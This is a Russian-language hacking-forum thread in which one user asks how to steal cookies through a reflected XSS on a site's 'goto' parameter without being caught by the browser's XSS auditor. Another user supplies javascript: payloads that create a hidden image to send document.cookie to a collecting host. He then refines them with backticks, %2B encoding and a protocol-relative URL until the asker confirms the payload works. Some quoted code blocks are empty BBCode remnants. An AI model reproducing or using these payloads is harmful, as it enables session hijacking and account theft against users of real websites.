HOME    FORUMS    MEMBERS    RECENT POSTS    LOG IN  
Баннер 1   Баннер 2

ANTICHAT — форум по информационной безопасности, OSINT и технологиям

ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию. Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club, и теперь снова доступен на новом адресе — forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
Вернуться   Форум АНТИЧАТ > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Песочница
Перезагрузить страницу Как заюзать reflective XSS?
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

  #1  
Старый 07.08.2017, 23:54
Dominant
Guest
Сообщений: n/a
Провел на форуме:
1386

Репутация: 0
По умолчанию
Есть reflected XSS и вот такой код отрабатывает:

javascript:alert(1)

Но вот такой:

">alert(1)

проходит но уже блочится xss auditor-oом.

Можно как-то слить куки не добавляя внутрь страницы ?
 
Ответить с цитированием

  #2  
Старый 08.08.2017, 01:22
crlf
Guest
Сообщений: n/a
Провел на форуме:
169212

Репутация: 441
По умолчанию
Можно так:

Код:
Code:
javascript:i=document.createElement('img');i.style.display='none';i.src='http://localhost/?'+escape(document.cookie);console.log(document.body.appendChild(i));
Если есть переносы строк или символы ломающие синтаксис, то нужно использовать urlencode.
 
Ответить с цитированием

  #3  
Старый 08.08.2017, 16:10
Dominant
Guest
Сообщений: n/a
Провел на форуме:
1386

Репутация: 0
По умолчанию
Забыл упомянуть важную деталь. Инъекция в коде страницы отображается как атрибут src:

src="javascript:alert(1)"

Когда добавляю этот код:

javascript:i=document.createElement('img');i.style .display='none';i.src='http://localhost/?'+escape(document.cookie);console.log(document.bo dy.appendChild(i));

то не отображается и не отрабатывает никак
 
Ответить с цитированием

  #4  
Старый 08.08.2017, 16:49
crlf
Guest
Сообщений: n/a
Провел на форуме:
169212

Репутация: 441
По умолчанию
Цитата:
Сообщение от Dominant  
Dominant said:

Инъекция в коде страницы отображается как атрибут src
Выложи сюда, посмотрим.
 
Ответить с цитированием

  #5  
Старый 08.08.2017, 17:02
Dominant
Guest
Сообщений: n/a
Провел на форуме:
1386

Репутация: 0
По умолчанию
Код:
Code:
site.com/index.php?goto=javascript:alert(1);
Вот такой запрос даёт:

Код:
Code:
Такой

Код:
Code:
site.com/index.php?goto=">alert(a);
Даёт:

Код:
Code:
alert(a);" name="main" scrolling="auto" NORESIZE frameborder="0" marginwidth="20" marginheight="20" border="no">
но блочится xss аудитором

Такой:

Код:
Code:
site.com/index.php?goto=javascript:i=document.createElement('img');i.style.display='none';i.src='http://localhost/?'+escape(document.cookie);console.log(document.body.appendChild(i));
не выдает ничего
 
Ответить с цитированием

  #6  
Старый 08.08.2017, 17:23
crlf
Guest
Сообщений: n/a
Провел на форуме:
169212

Репутация: 441
По умолчанию
У меня нормально отрабатывает:



PHP код:
PHP:
[COLOR="#000000"][COLOR="#0000BB"][/COLOR][COLOR="#007700"]

[/COLOR][/COLOR
 
Ответить с цитированием

  #7  
Старый 08.08.2017, 17:36
Dominant
Guest
Сообщений: n/a
Провел на форуме:
1386

Репутация: 0
По умолчанию
Цитата:
Сообщение от crlf  
crlf said:

У меня нормально отрабатывает:

PHP код:
PHP:
[COLOR="#000000"][COLOR="#0000BB"][/COLOR][COLOR="#007700"]

[/COLOR][/COLOR
Но при вводе такого кода в адресную строку - фрейм вообще не добавляется.

Проверил - сбой происходит на "http://". Если убрать их из скрипта то всё добавляется в src но кавычки фильтруются:

PHP код:
PHP:
[COLOR="#000000"][COLOR="#0000BB"][/COLOR][COLOR="#007700"][/COLOR][/COLOR
Без указания протокола нормально
 
Ответить с цитированием

  #8  
Старый 08.08.2017, 18:29
crlf
Guest
Сообщений: n/a
Провел на форуме:
169212

Репутация: 441
По умолчанию
Кавычку можно бэктиком (`) заменить. Плюс нужно заменить на %2B.

Код:
Code:
site.com/index.php?goto=javascript:i=document.createElement(`img`);i.style.display=`none`;i.src=`//localhost/aaaaaaa?`%2Bescape(document.cookie);console.log(document.body.appendChild(i));
 
Ответить с цитированием

  #9  
Старый 08.08.2017, 21:44
Dominant
Guest
Сообщений: n/a
Провел на форуме:
1386

Репутация: 0
По умолчанию
Цитата:
Сообщение от crlf  
crlf said:

Кавычку можно бэктиком (`) заменить. Плюс нужно заменить на %2B.
Код:
Code:
site.com/index.php?goto=javascript:i=document.createElement(`img`);i.style.display=`none`;i.src=`//localhost/aaaaaaa?`%2Bescape(document.cookie);console.log(document.body.appendChild(i));
Вот так заработало. Спасибо
 
Ответить с цитированием
Ответ



« Предыдущая тема | Следующая тема »


Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT.XYZ